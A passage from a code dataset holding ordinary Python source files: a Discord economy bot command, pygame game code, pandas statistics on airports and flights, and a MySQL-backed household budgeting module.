interaction.response.send_message(embed=embed)\r\n await asyncio.sleep(3)\r\n\r\n author_path[0] = \":blue_square:\"\r\n enemy_path[0] = \":red_square:\"\r\n\r\n author_path_update = random.randint(2, 6)\r\n enemy_path_update = random.randint(2, 6)\r\n\r\n author_path[author_path_update] = \":horse_racing:\"\r\n enemy_path[enemy_path_update] = \":horse_racing:\"\r\n\r\n embed.clear_fields()\r\n embed.add_field(name=\"You:\", value=\"\".join(author_path), inline=False)\r\n embed.add_field(name=f\"Enemy:\", value=\"\".join(enemy_path),\r\n inline=False)\r\n\r\n await interaction.edit_original_message(embed=embed)\r\n await asyncio.sleep(3)\r\n\r\n author_path[author_path_update] = \":blue_square:\"\r\n enemy_path[enemy_path_update] = \":red_square:\"\r\n\r\n author_path_update = random.randint(author_path_update, 9)\r\n enemy_path_update = random.randint(enemy_path_update, 9)\r\n\r\n author_path[author_path_update] = \":horse_racing:\"\r\n enemy_path[enemy_path_update] = \":horse_racing:\"\r\n\r\n embed.clear_fields()\r\n embed.add_field(name=\"You:\", value=\"\".join(author_path), inline=False)\r\n embed.add_field(name=f\"Enemy:\", value=\"\".join(enemy_path),\r\n inline=False)\r\n await interaction.edit_original_message(embed=embed)\r\n\r\n if author_path_update > enemy_path_update:\r\n await economy.add_money(interaction.user.id, \"wallet\", money * 2)\r\n\r\n await interaction.followup.send(content=\"You won!\")\r\n\r\n else:\r\n await economy.remove_money(interaction.user.id, \"bank\", money)\r\n\r\n await interaction.followup.send(content=\"You lose!\")\r\n\r\n\r\nasyncio.new_event_loop().run_until_complete(client.start(token=BOT_TOKEN, 
reconnect=True))\r\n","repo_name":"Nohet/DiscordEconomy","sub_path":"examples/dpy_base/slashCommands/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":17411,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"73705666085","text":"import math\nimport numpy as np\nfrom src.assets import *\nfrom random import randint\nfrom src.itemfiles.health import Health\nfrom src.itemfiles.gold import Gold\nfrom src.itemfiles.armor import Armor\nfrom src.itemfiles.attackdamage import AttackDamage\nfrom src.itemfiles.healthpotion import HealthPotion\n\n\nclass GreenEnemy(pygame.sprite.Sprite):\n def __init__(self, enemy_cords, enemy_group, dead_enemy_group, attack_group, item_group, player, stats):\n super().__init__(enemy_group)\n self.enemy_group = enemy_group\n self.dead_enemy_group = dead_enemy_group\n self.attack_group = attack_group\n self.item_group = item_group\n self.player = player\n self.stats = {key: value for key, value in stats.items()}\n self.speed = self.stats[\"speed\"]\n self.image = green_enemy_right\n self.rect = self.image.get_rect().move(enemy_cords[0], enemy_cords[1])\n self.origin_position = self.rect.center\n self.green_enemy_left_sprites = green_enemy_left_sprites\n self.green_enemy_right_sprites = green_enemy_right_sprites\n self.green_enemy_left_death_sprites = green_enemy_left_death_sprites\n self.green_enemy_right_death_sprites = green_enemy_right_death_sprites\n self.green_enemy_left_blow_sprites = green_enemy_left_blow_sprites\n self.green_enemy_right_blow_sprites = green_enemy_right_blow_sprites\n self.current_sprite = 0\n self.current_orientation = \"right\"\n self.current_direction = \"none\"\n self.timer = 0\n self.x_range = 0.3\n self.y_range = 0.3\n self.hit_box = self.rect\n self.mass = 1\n self.restitution = 0.8\n self.mask = pygame.mask.from_surface(self.image)\n self.jump_timer = np.random.uniform(75, 125)\n self.going_back = False\n self.going_back_timer = 0\n\n def move(self):\n if self.current_orientation == \"right\":\n self.image = self.green_enemy_right_sprites[1]\n if self.current_orientation == \"left\":\n self.image = self.green_enemy_left_sprites[1]\n self.move_def()\n\n def move_def(self):\n x_speed = (self.speed * self.x_range) / 3\n y_speed = (self.speed * self.y_range) / 4\n if self.current_direction == \"top-left\":\n self.rect.right -= x_speed\n self.rect.top -= y_speed\n self.current_orientation = \"left\"\n if self.current_direction == \"bottom-left\":\n self.rect.right -= x_speed\n self.rect.top += y_speed\n self.current_orientation = \"left\"\n if self.current_direction == \"top-right\":\n self.rect.right += x_speed\n self.rect.top -= y_speed\n self.current_orientation = \"right\"\n if self.current_direction == \"bottom-right\":\n self.rect.right += x_speed\n self.rect.top += y_speed\n self.current_orientation = \"right\"\n if self.current_direction == \"top\":\n self.rect.top -= y_speed\n if self.current_direction == \"bottom\":\n self.rect.top += y_speed\n if self.current_direction == \"left\":\n self.rect.right -= x_speed\n self.current_orientation = \"left\"\n if self.current_direction == \"right\":\n self.rect.right += x_speed\n self.current_orientation = \"right\"\n\n def stand_right(self):\n self.speed = 0\n self.image = self.green_enemy_right_sprites[0]\n\n def stand_left(self):\n self.speed = 0\n self.image = self.green_enemy_left_sprites[0]\n\n def is_alive(self):\n if self.stats[\"health\"] <= 0:\n self.stats[\"health\"] = 0\n if self in self.enemy_group:\n 
self.enemy_group.remove(self)\n self.dead_enemy_group.add(self)\n self.player.xp += self.stats[\"xp\"]\n\n def wait(self):\n if self.going_back_timer < 60:\n self.going_back_timer += 1\n else:\n self.going_back = True\n\n def move_back(self):\n x_range = self.origin_position[0] - self.rect.centerx\n y_range = self.origin_position[1] - self.rect.centery\n xy_range = math.hypot(x_range, y_range)\n if xy_range != 0:\n x_range /= xy_range*15\n y_range /= xy_range*15\n x_speed = self.stats[\"speed\"] / 2.5 * x_range\n y_speed = self.stats[\"speed\"] / 2.5 * y_range\n self.rect.x += x_speed\n self.rect.y += y_speed\n if self.rect.centerx > self.origin_position[0]:\n self.current_orientation = \"left\"\n if self.rect.centerx < self.origin_position[0]:\n self.current_orientation = \"right\"\n\n def detect_collision(self):\n if self.rect.colliderect(self.player.rect) and not self.speed == 0:\n if self.mask.overlap(self.player.mask, (self.player.rect.x - self.rect.x, self.player.rect.y - self.rect.y)) and self.player.resurrect_animation is False and self.player.channeling is False:\n self.player.stats[\"health\"] -= self.stats[\"attack\"] * (1-(self.player.stats[\"armor\"]/(self.player.stats[\"armor\"]+99))) * self.player.stats[\"damage_reduction\"]\n if self in self.enemy_group:\n self.enemy_group.remove(self)\n self.dead_enemy_group.add(self)\n self.rect.top -= 20\n if not self.mask.overlap(self.player.mask, (self.player.rect.x - self.rect.x, self.player.rect.y - self.rect.y)):\n if math.hypot(self.player.rect.centerx - self.rect.centerx, self.player.rect.centery - self.rect.centery) <= 750:\n self.move()\n else:\n if not self.origin_position[0]-5 <= self.rect.centerx <= self.origin_position[0]+5 and not self.origin_position[1]-5 <= self.rect.centery <= self.origin_position[1]+5:\n if self.going_back:\n self.move_back()\n else:\n self.wait()\n else:\n self.going_back = False\n self.going_back_timer = 0\n self.speed -= self.timer\n self.timer += 1.5\n if self.speed <= 0:\n if self.current_orientation == \"right\":\n self.stand_right()\n if self.current_orientation == \"left\":\n self.stand_left()\n if self.timer >= self.jump_timer:\n self.check_direction()\n self.timer = 0\n\n def check_direction(self):\n self.x_range = (abs(self.rect.centerx - self.player.rect.centerx) + abs(self.rect.centerx - self.player.rect.centerx)) / 2000\n if self.x_range >= 0.6:\n self.x_range = 0.6\n self.y_range = (abs(self.rect.centery - self.player.rect.centery) + abs(self.rect.centery - self.player.rect.centery)) / 2000\n if self.y_range >= 0.6:\n self.y_range = 0.6\n self.speed = self.stats[\"speed\"]\n if self.rect.centerx > self.player.rect.centerx:\n if self.rect.centery > self.player.rect.centery:\n self.current_direction = \"top-left\"\n if self.rect.centery < self.player.rect.centery:\n self.current_direction = \"bottom-left\"\n if self.rect.centery == self.player.rect.centery:\n self.current_direction = \"left\"\n if self.rect.centerx < self.player.rect.centerx:\n if self.rect.centery > self.player.rect.centery:\n self.current_direction = \"top-right\"\n if self.rect.centery < self.player.rect.centery:\n self.current_direction = \"bottom-right\"\n if self.rect.centery == self.player.rect.centery:\n self.current_direction = \"right\"\n if self.rect.centerx == self.player.rect.centerx:\n if self.rect.centery > self.player.rect.centery:\n self.current_direction = \"top\"\n if self.rect.centery < self.player.rect.centery:\n self.current_direction = \"bottom\"\n\n def right_death_animation(self):\n 
self.current_sprite += 0.1\n if self.current_sprite >= len(self.green_enemy_right_death_sprites):\n self.kill()\n self.drop_loot()\n else:\n self.image = self.green_enemy_right_death_sprites[int(self.current_sprite)]\n\n def left_death_animation(self):\n self.current_sprite += 0.1\n if self.current_sprite >= len(self.green_enemy_left_death_sprites):\n self.kill()\n self.drop_loot()\n else:\n self.image = self.green_enemy_left_death_sprites[int(self.current_sprite)]\n\n def right_blow_animation(self):\n self.current_sprite += 0.15\n if self.current_sprite >= len(self.green_enemy_right_blow_sprites):\n self.kill()\n else:\n self.image = self.green_enemy_right_blow_sprites[int(self.current_sprite)]\n\n def left_blow_animation(self):\n self.current_sprite += 0.15\n if self.current_sprite >= len(self.green_enemy_left_blow_sprites):\n self.kill()\n else:\n self.image = self.green_enemy_left_blow_sprites[int(self.current_sprite)]\n\n def death_check(self):\n if self.stats[\"health\"] <= 0:\n if self.current_orientation == \"right\":\n self.right_death_animation()\n if self.current_orientation == \"left\":\n self.left_death_animation()\n else:\n if self.current_orientation == \"right\":\n self.right_blow_animation()\n if self.current_orientation == \"left\":\n self.left_blow_animation()\n\n def drop_loot(self):\n x = randint(0, 99)\n if x <= 10:\n Health(self.rect, self.item_group, self.player)\n elif 10 < x <= 20:\n Gold(self.rect, self.item_group, self.player, randint(50, 100))\n elif 20 < x <= 30:\n Armor(self.rect, self.item_group, self.player, 1)\n elif 30 < x <= 40:\n AttackDamage(self.rect, self.item_group, self.player, 1)\n elif 40 < x <= 50:\n HealthPotion(self.rect, self.item_group, self.player)\n\n def update(self):\n self.is_alive()\n self.detect_collision()\n","repo_name":"kajotkajot/PythonGame","sub_path":"src/enemyfiles/greenenemy.py","file_name":"greenenemy.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34512660935","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef get_stats(df, col):\n cnt = df.groupby(col).size().rename('Count')\n \n mittel = round(cnt.mean(),2)\n varianz = round(cnt.var(),2)\n std = round(cnt.std(),2)\n max_f = round(cnt.max(),2)\n min_f = round(cnt.min(),2)\n \n text = \"\\nMittelwert: \" + str(mittel) + \"\\n\"\n text += \"Varianz:\\t\" + str(varianz) + \"\\n\"\n text += \"Standardabweichung: \" + str(std)+\"\\n\"\n text += \"Max:\"+str(max_f)+\"\\nMin:\"+str(min_f)\n return text \n\ndef stats_destinations(df):\n var = round(df['count_destinations'].var(),2)\n std = round(df['count_destinations'].std(),2)\n mittel = round(df['count_destinations'].mean(),2)\n median = round(df['count_destinations'].median(),2)\n \n count = len(df);\n \n text = \"Anzahl Flughafen:\"+str(count)+\"\\n\"\n text += \"Mittelwert: \"+str(mittel)+\"\\n\"\n text += \"Median:\\t\"+str(median)+\"\\n\"\n text += \"Varianz:\\t\"+str(var)+\"\\n\"\n text += \"Standardabweichung: \"+str(std)\n return text\n\ndef bar_category_region(df):\n fig, axes = plt.subplots(ncols=2, figsize=(20,7))\n df['type'].value_counts().plot(kind='bar', ax=axes[0])\n _ = axes[0].set_title('Bar-Chart Airport Typen')\n _ = axes[0].set_ylabel('Anzahl Flughafen')\n \n df['region'].value_counts().plot(kind='bar', ax=axes[1])\n _ = axes[1].set_title(\"Flughäfen pro Land\")\n _ = 
axes[1].set_ylabel(\"Anzahl Flughäfen\")\n return fig\n\ndef airport_infos(df):\n text = \"Anzahl Flughafen total:\\t\"+ str(len(df)) + \"\\n\"\n text += \"Flughäfen für Flugzeuge:\"+str(len(df[df['type'] == 'small_airport'])+len(df[df['type'] == 'medium_airport'])+len(df[df['type'] == 'large_airport']))+\"\\n\\n\"\n \n text += \"Anzahl grosser Flughäfen: \"+str(len(df[df['type'] == 'large_airport'])) + \"\\n\"\n text += \"Anzahl kleiner & mittlerer Flughäfen: \"+str(len(df[df['type'] == 'small_airport'])+len(df[df['type'] == 'medium_airport']))+ \"\\n\"\n text += \"\\nAnzahl Flughäfen ohne Region/Continent: \" + str(len(df[(df['region'] != 'unkown') | (df['continent'].notnull())]))\n \n select = df.loc[df['region'] == 'unkown']\n mittel = select['total'].mean()\n text += \"\\nDurchschnitt der Takeoffs/Landings ohne Region/Continent: \"+str(mittel)+\"\\n\"\n \n return text\n \ndef flight_infos(df): \n df_mai = df.loc[df['day'] < '2021-06-01']\n df_sep = df.loc[df['day'] > '2021-06-01']\n \n cnt = df.groupby('day').size().rename('Count')\n cnt_mai = df_mai.groupby('day').size().rename('Count')\n cnt_sep = df_sep.groupby('day').size().rename('Count')\n \n std = round(cnt.std(),2)\n std_mai = round(cnt_mai.std(),2)\n std_sep = round(cnt_sep.std(),2)\n median = round(cnt.median(),2)\n mittel = round(cnt.mean(),2)\n \n median_mai = cnt_mai.median()\n mittel_mai = round(cnt_mai.mean(),2)\n \n median_sep = cnt_sep.median()\n mittel_sep = round(cnt_sep.mean(),2)\n \n length_mai = len(df.loc[df['day'] < '2021-06-01'])\n length_sep = len(df.loc[df['day'] > '2021-06-01'])\n \n text = \"Total FLugverbindungen: \"+str(len(df))+\"\\n\"\n text += \"Median:\\t\\t\\t\" + str(median)+\"\\n\"\n text += \"Mittelwert:\\t\\t\" + str(mittel)+\"\\n\"\n text += \"Standardabweichung:\\t\" + str(std)+\"\\n\\n\"\n \n text += \"FLugverbindungen im Mai: \"\n text += str(length_mai) + \"\\n\"\n text += \"Mittelwert:\\t\\t\" +str(mittel_mai) + \"\\n\"\n text += \"Median:\\t\\t\\t\"+str(median_mai) + \"\\n\"\n text += \"Standardabweichung:\\t\" + str(std_mai)+\"\\n\\n\"\n \n text += \"FLugverbindungen im Sep: \"\n text += str(length_sep) + \"\\n\"\n text += \"Mittelwert:\\t\\t\" +str(mittel_sep) + \"\\n\"\n text += \"Median:\\t\\t\\t\"+str(median_sep) + \"\\n\"\n text += \"Standardabweichung:\\t\" + str(std_sep)\n \n return text\n\ndef show_distribution(df_airports): \n df_takeoffs = df_airports.sort_values(['takeoffs'], ascending=False).head(60)\n fig, ax = plt.subplots(figsize=(15,5))\n _ = ax.bar(df_takeoffs['ident'], df_takeoffs['takeoffs'], width=0.6, label=\"Takeoff's\")\n _ = ax.bar(df_takeoffs['ident'], df_takeoffs['landings'], width=0.6, bottom=df_takeoffs['takeoffs'], label=\"Landings\")\n _ = ax.set_title(\"Anzahl Flugverkehr\")\n _ = ax.set_xlabel(\"Flughäfen\")\n _ = ax.set_ylabel(\"Anzahl Flüge (ein- und ausgehend)\")\n _ = ax.set_xticks(df_takeoffs['ident'])\n _ = ax.set_xticklabels(df_takeoffs['ident'],rotation=70)\n _ = ax.legend()\n return fig\n\ndef show_distribution_region(df_airports): \n o = df_airports.groupby(['region'], as_index=False)[['takeoffs', 'landings', 'total']].sum()\n g = o.plot(x='region', y=['takeoffs','landings'], kind='barh', width=.95, figsize=(10,8),fontsize=13).set(\n title='Flugverkehr nach Region', xlabel=\"Anzahl Flugverbindungen\", ylabel=\"Regionen\")\n return g\n\ndef show_cum_flights(df, title):\n cnt = df.groupby('day').size().rename('Count')\n hist = np.histogram(cnt)\n pv = np.cumsum(cnt)\n\n fig, ax = plt.subplots(figsize=(20,5))\n _ = ax.step(cnt.keys(), pv, 
where='pre', drawstyle='steps', label='Kumulative Verteilung')\n _ = ax.set_title(title)\n _ = ax.set_ylabel(\"Kumulative Verteilung\")\n _ = ax.set_xlabel(\"Datum\")\n \n return ax\n\ndef show_stats(df_flights):\n df_flights[\"day\"] = df_flights[\"day\"].astype(\"datetime64\")\n\n df_mai = df_flights.loc[df_flights['day'] < '2021-06-01']\n flights_m = df_mai.groupby([df_mai[\"day\"]]).size()\n df_sep = df_flights.loc[df_flights['day'] > '2021-06-01']\n flights_s = df_sep.groupby([df_sep[\"day\"]]).size()\n\n mittel_m = flights_m.mean()\n std_m = flights_m.std()\n mittel_s = flights_s.mean()\n std_s = flights_s.std()\n\n fig, ax = plt.subplots(ncols=2, figsize=(18,5))\n flights_m.plot(kind=\"bar\", width=.8, rot=85, title=\"Flugverbindungen Monat Mai\", xlabel=\"Tag\", ylabel=\"Anzahl Verbindungen\", ax=ax[0])\n xmin, xmax = ax[0].get_xlim()\n _ = ax[0].hlines(mittel_m, xmin, xmax, 'red', linestyle='-', label='Mittelwert')\n _ = ax[0].hlines(mittel_m-std_m, xmin, xmax, 'lightgreen', linestyle='--', label='Standardabweichung')\n _ = ax[0].hlines(mittel_m+std_m, xmin, xmax, 'lightgreen', linestyle='--')\n _ = ax[0].legend()\n\n flights_s.plot(kind=\"bar\", width=.8, rot=85, title=\"Flugverbindungen Monat Sep.\", xlabel=\"Tag\", ylabel=\"Anzahl Verbindungen\", ax=ax[1])\n xmin, xmax = ax[0].get_xlim()\n _ = ax[1].hlines(mittel_s, xmin, xmax, 'red', linestyle='-', label='Mittelwert')\n _ = ax[1].hlines(mittel_s-std_s, xmin, xmax, 'lightgreen', linestyle='--', label='Standardabweichung')\n _ = ax[1].hlines(mittel_s+std_s, xmin, xmax, 'lightgreen', linestyle='--')\n _ = ax[1].legend()\n \n return fig, mittel_m, mittel_s, std_m, std_s\n\ndef show_stats_destinations(df_airports):\n o = df_airports.groupby(['region'], as_index=False)[['count_destinations']].sum()\n g = o.plot(x='region', y='count_destinations', kind='barh', width=.95, figsize=(10,8),fontsize=13).set(\n title='Anzahl unterschiedlicher Destinationen nach Region', xlabel=\"Anzahl Destinationen\", ylabel=\"Regionen\")\n return g\n\ndef load_airports():\n df = pd.read_csv(\"data/preprocessed/airports.csv\")\n \n df['landings'] = df['landings'].astype(int)\n df['takeoffs'] = df['takeoffs'].astype(int)\n df['latitude'] = df['latitude'].astype(float)\n df['longitude'] = df['longitude'].astype(float)\n df['type'] = df['type'].astype('category')\n df['region'] = df['region'].astype('category')\n \n return df\n\ndef load_flights():\n df = pd.read_csv(\"data/preprocessed/flights.csv\")\n df['day'] = pd.to_datetime(df['day'])\n return df\n ","repo_name":"marcschny/DataStory_AirplaneHubs","sub_path":"AirplaneHubs/descriptive_stats.py","file_name":"descriptive_stats.py","file_ext":"py","file_size_in_byte":7697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"113048624","text":"import pygame\nfrom show_manager import Show_Manager\nfrom settings import HEIGHT, WIDTH, FPS\n\n\ndef initialize_pygame():\n pygame.init()\n window = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Fireworks\")\n pygame.font.init()\n\n return window\n\n\ndef main():\n window = initialize_pygame()\n show_manager = Show_Manager(window)\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_q]:\n pygame.quit()\n quit()\n\n if keys[pygame.K_r]:\n main()\n\n show_manager.update()\n show_manager.draw()\n\n\nif __name__ == 
\"__main__\":\n main()\n","repo_name":"unit0113/projects","sub_path":"Python_Playground/fireworks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2264263145","text":"from sqlalchemy import create_engine, MetaData\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nimport datetime\nimport re\n\neng = create_engine('mysql://root:mysql@localhost/moneykeeper?charset=utf8mb4')\ndb_session = scoped_session(sessionmaker(autoflush=False,\n bind=eng))\nmd = MetaData(bind=eng)\n\n\ndef show_month_dbt_crt(start_date, last_date) -> dict:\n \"\"\"Shows incomes and credits during date period\"\"\"\n sql_for_trans = '''SELECT date, transacion_type_id, SUM(value)\n FROM transaction\n WHERE date BETWEEN :w1 AND :w2\n AND transacion_type_id IN (:w3)\n GROUP BY date, transacion_type_id\n ORDER BY date, transacion_type_id'''\n\n res_trn = {'dbt': db_session.execute(sql_for_trans, {'w1': start_date, 'w2': last_date, 'w3': 1}).fetchall(),\n 'crt': db_session.execute(sql_for_trans, {'w1': start_date, 'w2': last_date, 'w3': 2}).fetchall(),\n 'sums': {\n 'plus': show_sums(start_date, last_date, 1),\n 'minus': show_sums(start_date, last_date, 2)\n }}\n\n return res_trn\n\n\ndef show_sums(fdate, ldate, trn_type_id: int) -> float:\n \"\"\"Shows sum per date period\"\"\"\n sql_for_sum = '''SELECT SUM(value)\n FROM transaction\n WHERE date BETWEEN :w1 AND :w2\n AND transacion_type_id = :w3'''\n sum_of_period = db_session.execute(sql_for_sum, {'w1': fdate, 'w2': ldate, 'w3': trn_type_id}).fetchone()\n if sum_of_period[0] is None:\n return 0\n else:\n return sum_of_period[0]\n\n\ndef add_trn_in_db(usr, trn_t_id, prc_id, d, val=0, acc_fr=1, comment=''):\n if type(d) != datetime.date:\n try:\n d = datetime.datetime.strptime(d, '%Y-%m-%d')\n except TypeError:\n raise DateError('Error in date')\n\n try:\n int_tr_id = int(trn_t_id)\n except ValueError:\n raise TrnTypeIdError('Ошибка идентификатора вида расходов//расходов')\n\n try:\n float_val = float(val)\n except ValueError:\n raise InputError('Неверный формат суммы')\n\n try:\n int_acc_fr = int(acc_fr)\n except ValueError:\n raise InputError('Счет отправки не существует')\n\n if int_tr_id == 2 or (trn_t_id == 3 and int_acc_fr == 1):\n new_balance = get_balance() - float_val\n elif int_tr_id == 3 and int_acc_fr == 2:\n new_balance = get_sber_balance() - float_val\n else:\n new_balance = 0\n\n if new_balance < 0:\n raise BalanceBelowZeroError('Баланс не может быть меньше нуля')\n\n try:\n sql_for_adding_trans = '''INSERT INTO transaction(user_id, transacion_type_id, \n purchase_id, date, value, account_from_id, comment)\n VALUES(:v1, :v2, :v3, :v4, :v5, :v6, :v7)'''\n db_session.execute(sql_for_adding_trans, {'v1': usr, 'v2': trn_t_id,\n 'v3': prc_id, 'v4': d,\n 'v5': val, 'v6': acc_fr, 'v7': comment})\n db_session.commit()\n except ValueError:\n raise DateError\n except Exception:\n db_session.rollback()\n raise SQLError('Error in SQL-code')\n\n\ndef get_transactions_per_day(date_parameters: dict):\n \"\"\"Selects transactions per day\"\"\"\n sql_for_tr_per_day = '''SELECT t_t.name tt_id, \n CONCAT(g.name, ' - ', p.name) group_purchase, u.fname, t.value\n FROM transaction t \n INNER JOIN transacion_type t_t ON t.transacion_type_id = t_t.transacion_type_id\n INNER JOIN purchase p ON t.purchase_id = p.purchase_id\n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id\n INNER JOIN user u ON t.user_id = u.user_id\n WHERE t.date = 
:u1'''\n try:\n tr_per_day = db_session.execute(sql_for_tr_per_day, {'u1': datetime.date(int(date_parameters['y']),\n int(date_parameters['m']),\n int(date_parameters['d']))}).fetchall()\n except ValueError:\n raise DateError\n\n return tr_per_day\n\n\ndef get_trans_type():\n \"\"\"Selects all transaction types\"\"\"\n return db_session.execute('SELECT transacion_type_id, name FROM transacion_type').fetchall()\n\n\ndef get_owner():\n \"\"\"Selects all users from user\"\"\"\n return db_session.execute('SELECT user_id, fname FROM user').fetchall()\n\n\ndef get_month_values(fday, lday, trn_type_id):\n \"\"\"Selects incomes/costs per month\"\"\"\n sql_for_month_values = '''SELECT g.name g_name, SUM(value) sum_value\n FROM transaction t \n INNER JOIN purchase p ON t.purchase_id = p.purchase_id \n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id\n WHERE t.date BETWEEN :w1 AND :w2\n AND t.transacion_type_id = :w3\n GROUP BY 1 ORDER BY 2 DESC;'''\n return db_session.execute(sql_for_month_values, {'w1': fday, 'w2': lday, 'w3': trn_type_id}).fetchall()\n\n\ndef get_top(fday, lday):\n \"\"\"Show top purchases per month\"\"\"\n sql_for_top = '''SELECT CONCAT(g.name, ' - ', p.name) p_name, SUM(t.value) val FROM transaction t\n INNER JOIN purchase p ON t.purchase_id = p.purchase_id\n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id \n WHERE t.date BETWEEN :w1 AND :w2\n AND t.transacion_type_id = 2 AND t.save_money = 'N'\n GROUP BY p.name \n ORDER BY 2 DESC LIMIT 10;'''\n return db_session.execute(sql_for_top, {'w1': fday, 'w2': lday}).fetchall()\n\n\ndef get_last_months_purchase(m_for_show=6, datepar='NOW()'):\n \"\"\"Getting incomes and costs grouped by month\"\"\"\n sql_for_exec = '''SELECT MONTH(t.date) month,\n ( SELECT SUM(t1.value) FROM transaction t1 WHERE t1.transacion_type_id = 1 AND t1.save_money = 'N'\n AND MONTH(t1.date) = MONTH(t.date) AND YEAR(t1.date) = YEAR(t.date) GROUP BY YEAR(t1.date), MONTH(t1.date) ) incomes,\n ( SELECT SUM(t2.value) FROM transaction t2 WHERE t2.transacion_type_id = 2 AND t2.save_money = 'N'\n AND MONTH(t2.date) = MONTH(t.date) AND YEAR(t2.date) = YEAR(t.date) GROUP BY YEAR(t2.date), MONTH(t2.date) ) costs\n FROM transaction t\n WHERE date BETWEEN DATE_SUB(DATE(:w2), INTERVAL :w1 MONTH) AND DATE(:w2)\n GROUP BY YEAR(t.date), MONTH(t.date);'''\n return db_session.execute(sql_for_exec, {'w1': m_for_show, 'w2': datepar}).fetchall()\n\n\ndef get_balance(last_month=datetime.date.today().month, last_year=datetime.date.today().year):\n \"\"\"Get balance of account\"\"\"\n sql_for_balance = '''SELECT\n (SELECT IFNULL(SUM(t1.value), 0) FROM transaction t1 \n WHERE MONTH(t1.date) <= :w1 AND YEAR(t1.date) <= :w2\n AND t1.transacion_type_id = 1 AND t1.save_money = 'N') -\n (SELECT IFNULL(SUM(t2.value), 0) FROM transaction t2 \n WHERE MONTH(t2.date) <= :w1 AND YEAR(t2.date) <= :w2\n AND t2.transacion_type_id = 2 AND t2.save_money = 'N') balance;'''\n res = db_session.execute(sql_for_balance, {'w1': last_month, 'w2': last_year}).fetchall()[0][0] - get_sber_balance()\n return res if res is not None else 0\n\n\ndef get_accounts():\n \"\"\"Get accounts\"\"\"\n sql_for_accs = '''SELECT * FROM account;'''\n return db_session.execute(sql_for_accs).fetchall()\n\n\ndef get_sber_balance(m=datetime.date.today().month, y=datetime.date.today().year):\n \"\"\"Get sber balance\"\"\"\n sql_for_sber_balance = '''SELECT\n (SELECT IFNULL(SUM(t1.value), 0) FROM transaction t1 \n WHERE MONTH(t1.date) = :w1 AND YEAR(t1.date) = :w2 AND t1.transacion_type_id = 3 \n AND 
t1.account_from_id = 1) - \n (SELECT IFNULL(SUM(t2.value), 0) FROM transaction t2\n WHERE MONTH(t2.date) = :w1 AND YEAR(t2.date) = :w2 AND t2.transacion_type_id = 3\n AND t2.account_from_id = 2) sber_bal'''\n res = db_session.execute(sql_for_sber_balance, {'w1': m, 'w2': y}).fetchall()[0][0]\n return res if res is not None else 0\n\n\ndef get_sber_transactions(m, y):\n \"\"\"Get operations for current period\"\"\"\n sql_for_sber_trns = '''SELECT t.date, a.name, t.comment, u.fname, t.value FROM transaction t\n INNER JOIN account a ON t.account_from_id = a.account_id\n INNER JOIN user u ON t.user_id = u.user_id\n WHERE MONTH(t.date) = :w1 AND YEAR(t.date) = :w2\n AND transacion_type_id = 3 ORDER BY t.date'''\n return db_session.execute(sql_for_sber_trns, {'w1': m, 'w2': y}).fetchall()\n\n\ndef get_planning_parameters(pl_gr_id='OPT', cur_date='DATE_FORMAT(CURDATE(), %Y-%m-01', with_pur_id=False):\n \"\"\"Get planning parameters for current month\"\"\"\n sql_select_part = '''SELECT CONCAT(g.name, ' - ', p.name) pp_name, IFNULL(pp.planning_date, 'No date') pp_date, \n pp.pp_val pp_val'''\n sql_from_part = '''\n FROM planning_parameter pp \n INNER JOIN purchase p ON pp.purchase_id = p.purchase_id\n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id\n WHERE p.planning_group_pl_gr_id = :w2\n AND pp.date_from <= :w3 AND pp.date_to > :w3'''\n if with_pur_id:\n sql_select_part += ', pp.purchase_id pp_pur_id'\n sql_for_pp = sql_select_part + sql_from_part\n return db_session.execute(sql_for_pp, {'w2': pl_gr_id,\n 'w3': cur_date}).fetchall()\n\n\ndef get_planning_sums_by_user(limit=2, tr_type_id=1, cur_date='DATE_FORMAT(CURDATE(), %Y-%m-01'):\n \"\"\"Get planning earnings per user\"\"\"\n sql_for_sums_by_user = '''SELECT u.fname username, SUM(pp.pp_val) FROM planning_parameter pp INNER JOIN user u\n ON pp.user_id = u.user_id\n WHERE pp.purchase_id IN (SELECT p.purchase_id FROM purchase p INNER JOIN group_goods g\n ON p.group_goods_id = g.group_goods_id WHERE g.transacion_type_id = :w2)\n AND pp.date_from <= :w3 AND pp.date_to > :w3\n GROUP BY u.fname LIMIT :w1;'''\n return db_session.execute(sql_for_sums_by_user, {'w1': limit,\n 'w2': tr_type_id,\n 'w3': cur_date}).fetchall()\n\n\ndef get_planning_groups():\n \"\"\"Show planning groups\"\"\"\n return db_session.execute('''SELECT pl_gr_id, name FROM planning_group''').fetchall()\n\n\ndef update_planning_from_json(json_obj, date_of_planning):\n \"\"\"Updating planning parameters from JSON-object\"\"\"\n sql_for_updating = 'CALL edit_planning_parameter(:w1, :w2, :w3, :w4, :w5)'\n planning_user = 1\n for json_row in json_obj:\n if re.match(r'^\\d{4}-\\d{2}-\\d{2}', json_row['pp_date']) is None:\n json_row['pp_date'] = None\n try:\n db_session.execute(sql_for_updating, {'w1': json_row['pp_val'],\n 'w2': date_of_planning,\n 'w3': json_row['pp_name'],\n 'w4': json_row['pp_date'],\n 'w5': planning_user})\n db_session.commit()\n except Exception:\n db_session.rollback()\n raise SQLError('Cannot write in db')\n\n\nclass SQLError(Exception):\n pass\n\n\nclass DateError(Exception):\n pass\n\n\nclass TrnTypeIdError(Exception):\n pass\n\n\nclass BalanceBelowZeroError(Exception):\n pass\n\n\nclass 